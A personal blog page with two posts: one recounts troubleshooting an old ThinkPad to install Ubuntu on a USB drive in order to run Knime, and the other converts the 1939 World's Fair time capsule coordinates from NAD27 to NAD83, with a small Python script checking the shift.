    My primary machine is a Mac. I used to have a Thinkpad 600E (or some number like that) which worked out pretty well. I upgraded to a T23 but ended up with lots of programs getting Linux installed on it. My girlfriend at the time, a big Mac fan, helped convince me to get a Mac. I've not looked back sense.

    Sometimes I need to go back. There is after all software that doesn't run on a Mac. One is Knime. It's written Java but there's some conflict between the AWT and the Eclipse SWT that means it doesn't work on my machine. When I visited friends in the US over Thanksgiving I pulled out my old T23 which I had stored in their garage. Perhaps I could use that to run the Linux version.

    I tried to boot it but it didn't find the hard disk. Strange. Wonder if the disk went bad. I took it with my back from the US and since bad contacts are an easy problem to fix I did the first trick of pulling things apart and putting it back together again. Nope. Didn't work.

    I made an install disk for Ubuntu Linux (Feisty) to see what that would tell me. Went through the first few screens but it couldn't find a disk. To be correct, it couldn't figure out which driver to use for the disk. My translation: disk is bad or hardware to the disk is bad. I figured the first case was more likely and went looking for a replacement. First step was to a local computer repair shop. He said (in Swedish as his English wasn't good), "yes, the disk is bad."

    I went to a computer store on Hisingen (that's the island immediately across from downtown) and asked about getting a new hard disk. They didn't have any in stock that would work and suggested I go to another computer store somewhat nearby. He showed me where on the map but I had never been there, it wasn't easy to go to without a car, and it was about 5pm so the sun had set 1.5 hours earlier and I didn't want to hunt around in the darkness. I went home and looked up the place on the map so I could orient myself better.

    It was also on Hisingen, but the bus that way goes only every 30 minutes so it was about a 15-20 minute walk from the Frihamn stop. Got there. It reminded me of a NAPA auto parts place, or of the really good hardware stores. The ones where you go to the desk and say "I want an 8-inch left-handed variable-speed smoke-shifter" and they'll get it for you from the stock room. They had a replacement drive, in 80 GB (the old was 50).

    While I was there I opened the bag, plugged in the machine and ... no go. The machine still didn't see the disk. So it looks like I just wasted money for nothing. I checked - no return policy for this, even though I hadn't even left the store. I then checked with the repairs people, but they don't repair laptops, only desktops. They did give me the name of a place to go to, but I'm thinking the price is getting too much for exploratory research.

    Subscribing to the sunk cost fallacy, can I spend some more money so the money I spent didn't go to waste? Well, I can buy an IDE enclosure so I can get my Mac to connect to the new drive over USB. Plus, the T23 might be able to see a USB drive. I bought it.

    Started working on that today. (This is now day 3 of the attempt to install Knime.) Whaddaya know, the Ubuntu installer sees the USB disk and I can install onto it. And boot. It's dog slow because everything's going over USB2 and not the IDE bus, but usable. Problem is, there's only a console. I don't have a GUI and can't figure out how to get the wireless working so I can connect to my local base station.

    Strange thing is that I can only get a console interface. Where's X? When I installed there were a bunch of red lines in the output when it tried to connect over the network. Because wireless wasn't working, I had told it I would configure the network later. Perhaps had I had the network going it would have worked better? Or are all Ubuntu installs like this?

    How do I install X? "xinit"? Nope. Though the error message gives me something about using apt to install a package. Tried that out. Red lines. Try "apt" and the various apt-programs. Figured out how to tell it to look at the CD-ROM for files. (Or it knew it already.) Messed around some, got some X client apps installed, but no X server. Do I need to connect to the network for the rest of this?

    Finally gave up, unplugged my Airport Express (I have no router so can only plug one Ethernet cable in). Nothing. Power-cycled the DSL modem. ifconfig says I've got some network traffic on eth0, but no DHCP. How do you tell Ubuntu/Linux to enable DHCP? Does the network even work? The install disk lets me configure for DHCP so I rebooted with that. Yippee! It sees the network, and I can ssh out. But how do I make that work with my install? Should I just reinstall from scratch given that I can see the network now? In retrospect I think the answer is "yes".

    There's a program called "dhclient3". Wonder what that does. Run it. Interesting. Looks like .. yes .. I've got a DHCP connection. My "nslookup www" fails instead of timing out. I can see the outside world.

    Worked with "apt" some more and figured out how to get the X server running. "startx" to get into it - and it exists. No window manager found. What does Ubuntu use? Gnome, right? Used apt to install various Gnome parts. Now I can get a system working .. but there's no window manager. I had installed metacity. How do I start it? Where's the terminal? Can't find that, but was able to make a desktop item that starts "/bin/bash" in a terminal. Only to get the message that gnome-terminal wasn't installed.

    At this point I'm in the GUI, "Synaptic Package Manager" and I install gnome-terminal. That's enough to get a window open where I can type "metacity". Terminal, web browser, and the ability to swap between windows. What more does anyone need?

    For one, a slew of missing programs. A lot of Unix system utilities are missing. Go through Synaptic and toggle the ones that look important. There's an icon by some of them which I think means "part of the normal Ubuntu install". I clicked on that column so I would see them grouped together. After 5 minutes of near 100% CPU use I killed it and started again.

    Toggled on the ones that I thought were useful, and chose ones like OpenOffice that have a lot of dependencies. Install. Time to go out salsa dancing. Came back.

    In various bits of playing around I found the Network Manager and enabled eth0. Tried to enable my wireless but I've forgotten the password. I think I'll just reset it and let it be open. I still haven't figured out how to get Metacity as the initial window manager. And I installed yet more programs. I tried "wicd" as a perhaps easier way to deal with my wireless. It's got a tray control that might be something like what my Mac has. It worked enough to tell me the wireless was working, but then it failed, miserably, with a Python traceback saying it tried to send a Unicode string over DBUS. (Note to self: you've also said you're going to look into DBUS.) I couldn't get it working again.

    In the meanwhile I downloaded Knime. All 170MB or so for the developer's version. This includes code from Eclipse, but it's huge. There's no reason such a program should take so much space, I think. Why, "when I was a kid I had ...." I remember Craig and I being astonished in 1990 when we took an operating systems course and found out that SunOS's kernel was over 1MB. On the other hand, it doesn't take all that long to download. I've got a 2MBit/sec connection here, for the same price as my old sub-1MBit/sec in Santa Fe.

    I should reboot. In addition to getting the network (hopefully) working, I also installed a libc security update. I wonder if I'll get a GUI login. ... Or if it will boot. .... Well, that took a while. Text prompt, then startx, then .. oops, to the terminal to start metacity. Cool, the DNS is working. Go back to the package manager. A-ha! There's a "ubuntu-desktop" option (and a few others) which are virtual packages that load all of the dependencies. Looks like I'm missing a lot of files. *sigh*

    While that's happening I did get Eclipse/Knime started. The first line in the README is .. "update the Knime installation."

    Why am I writing this now? I'll skip the obvious Mac vs. Linux comparisons. The Ubuntu people are working on a really hard problem that Mac doesn't have because Apple controls the platform. A question is, should I be proud, happy, excited or otherwise joyous that I managed to get all of this working? It was a lot to figure out on my own and there are many who wouldn't have gotten it, or would have given up, or would have (as I should have) just reinstalled and seen if that improved things.

    In looking up some of the network problems I found several which had step-by-step walkthroughs of the installation process, and even one which had a video clip of a guy talking about the installation and suggestions for what to install afterwards. That's where I got the pointer to wicd. Yet it feels like the same problem I have when I buy a new computer. The field changes so much and I don't pay enough attention to it so that the knowledge gained doesn't really help for the next time.

    There are people who like tracking hardware and OS information. I'm more at the application level, and do that myself with APIs and libraries and web interfaces. Which means I feel these last three days were almost a complete waste. I like being able to ignore things I don't care about. Linux feels more written for those who care about things I don't.

    I hope the Knime investigation is worth it. There are a couple of other things I'm thinking to do with an extra Linux machine, so this isn't the only reason, just the driving one. But perhaps serendipity will strike with the others.

    P.S. It's now the next day from when I wrote that. Everything's downloaded, installed (except some acp things that Synaptic said didn't install correctly and were removed; and Eclipse demanded interaction when looking for a mirror when I wanted to let it go overnight while I slept so I had to finish that off this morning) and working. I haven't yet checked to see if I get a graphical login after reboot, or a working window manager. What I've got is good enough. I'll say it again - working from a USB2-based drive is mind-numbingly slow.



    Time capsule #

    Came across this link on BoingBoing about a film about the 1939 World's Fair. It's "The Middleton Family at the New York World's Fair" and is available through archive.org. I watched some of it. Can't say it was worthwhile.

    One of the things it mentioned was the time capsule buried then, to be opened in 5,000 years. The term time capsule was invented specifically for it, though the practice is older. How will the people of the year 6939 know about the time capsule? One way was to publish a book, with copies sent to libraries and archives around the world, titled The Book of Record of The Time Capsule. It's on acid-free paper that should last a long time, with copies distributed widely, in the hopes that in the deep future someone will come across it and think to find and open the capsule.

    I read part of the book. It's in the somewhat florid style of the time, which I think gets its influence from oratory.

    By A.D. 6939, it is probable, all present-day landmarks, city surveys, and other such aids for locating such an object will have disappeared. The spot may still be discovered, however, by determination of the latitude and longitude. The exact geodetic coordinates [North American Datum of 1927] are:
        Latitude 40° 44' 34".089 north of the Equator
        Longitude 73° 50' 43".842 west of Greenwich
    

    I'm writing this only 68 years in the future. There are people still alive who were at that fair. I could find the capsule's location in many ways, but I decided to use the lat/long. Using Google Maps I see it's in Flushing Meadows Park, which is also where other sources say it is. But it's very close to some limited access roads and there doesn't appear to be anything at the spot.

    We no longer use the North American Datum of 1927. I converted from NAD27 to NAD83 to get 40° 44' 34.45671" N by 73° 50' 42.32593" W, which is a shift of 37.289 meters. Bingo! Arrow marks the spot.
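
    A rough sanity check of that shift, as a Python sketch. It does not do the datum conversion itself; the NAD83 numbers are simply the ones quoted above. The function names are my own, and the distance assumes a spherical Earth with a 6,371 km mean radius and treats the small patch of ground as flat, so expect it to agree with the 37.289 meter figure only to within a fraction of a meter.

```python
import math

def dms_to_degrees(degrees, minutes, seconds):
    """Convert degrees, minutes and seconds of arc to decimal degrees."""
    return degrees + minutes / 60.0 + seconds / 3600.0

# (latitude, longitude) in decimal degrees; west longitudes are negative.
nad27 = (dms_to_degrees(40, 44, 34.089), -dms_to_degrees(73, 50, 43.842))
nad83 = (dms_to_degrees(40, 44, 34.45671), -dms_to_degrees(73, 50, 42.32593))

# Assumption: spherical Earth with the commonly used mean radius.
EARTH_RADIUS_M = 6371000.0

def approx_distance_m(p1, p2):
    """Flat-patch (equirectangular) distance in meters between two
    nearby (lat, lon) points given in decimal degrees."""
    lat1, lon1 = [math.radians(v) for v in p1]
    lat2, lon2 = [math.radians(v) for v in p2]
    mean_lat = (lat1 + lat2) / 2.0
    north = (lat2 - lat1) * EARTH_RADIUS_M
    # Meridians converge toward the poles, so scale by cos(latitude).
    east = (lon2 - lon1) * math.cos(mean_lat) * EARTH_RADIUS_M
    return math.hypot(north, east)

shift = approx_distance_m(nad27, nad83)
print("shift is about %.1f meters" % shift)
```

    Most of the shift is in longitude: about 1.5 arc-seconds east, against under 0.4 arc-seconds north.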



    Copyright © 2001-2008 Dalke Scientific Software, LLC.